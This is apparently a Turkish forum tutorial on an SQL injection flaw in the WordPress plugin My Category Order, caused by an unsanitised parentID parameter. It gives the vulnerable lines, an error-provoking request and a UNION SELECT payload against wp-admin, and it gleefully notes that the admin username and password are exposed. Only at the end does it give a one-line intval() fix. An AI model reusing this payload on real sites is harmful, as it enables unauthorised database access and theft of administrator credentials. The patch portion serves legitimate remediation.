Standart WordPress 2.8 Sql İnjection Açığı
E
vet arkadaşlar bu yazımda günümüzde bir çok alan için kullanılan ve çok yaygın olan bir blog scripti olan Wordpress içine yüklenen bi pluginden dolayı verdiği kritik sql injection açığını anlatıcam
plugini
http://wordpress.org/extend/plugins/my-category-order/
burdan temin edebilirsiniz plugin adı mycategoryorder.php dosyasındadır
mycategoryorder.php dosyasını not defteri yada wordpad ile açtığınızda 47 ve 48.inci satırlarda
if (isset($_GET[’parentID’]))
$parentID = $_GET[’parentID’];
bu kodu bulacaksınız açık burdan kaynaklanmaktadır nasıl fixleyeceğinizi konu sonunda ayrı olarak anlatıcam açığın nasıl çalıştığına geri dönelim
evet işte exploitimizde bu
http://localh0st/wp-admin/post-new.p...String=3,5,4,1
yaptığınızda
[You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’’ ORDER BY term_order ASC’ at line 1]
SELECT * FROM wp_terms t inner join wp_term_taxonomy tt on t.term_id = tt.term_id WHERE taxonomy = ’category’ and parent = 0’ ORDER BY term_order ASC
bu hata gelecektir evet doğru yoldasınız mutlu sona ulaşmanıza az kaldı
http://localh0st/wp-admin/post-new.p...ies&parentID=0 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11--&idString=3,5,4,1
[+]
aman Allahım neler görüyorum admin panelinin kullanıcı adı ve şifresi
sonrasını biliyorsunuz zaten
FİXLEMEYE GELİNCE....
hatırlarmısınız mycategoryorder.php dosyasını açmış 47 ve 48. satırlardaki açığın kaynaklandığı kodları bulmuştuk şu kodlardan bahsediyorum...
if (isset($_GET[’parentID’]))
$parentID = $_GET[’parentID’];
işte bu kodları aşağıdaki kodla değiştireceksiniz...
if (isset($_GET[’parentID’]))
$parentID = intval($_GET[’parentID’]);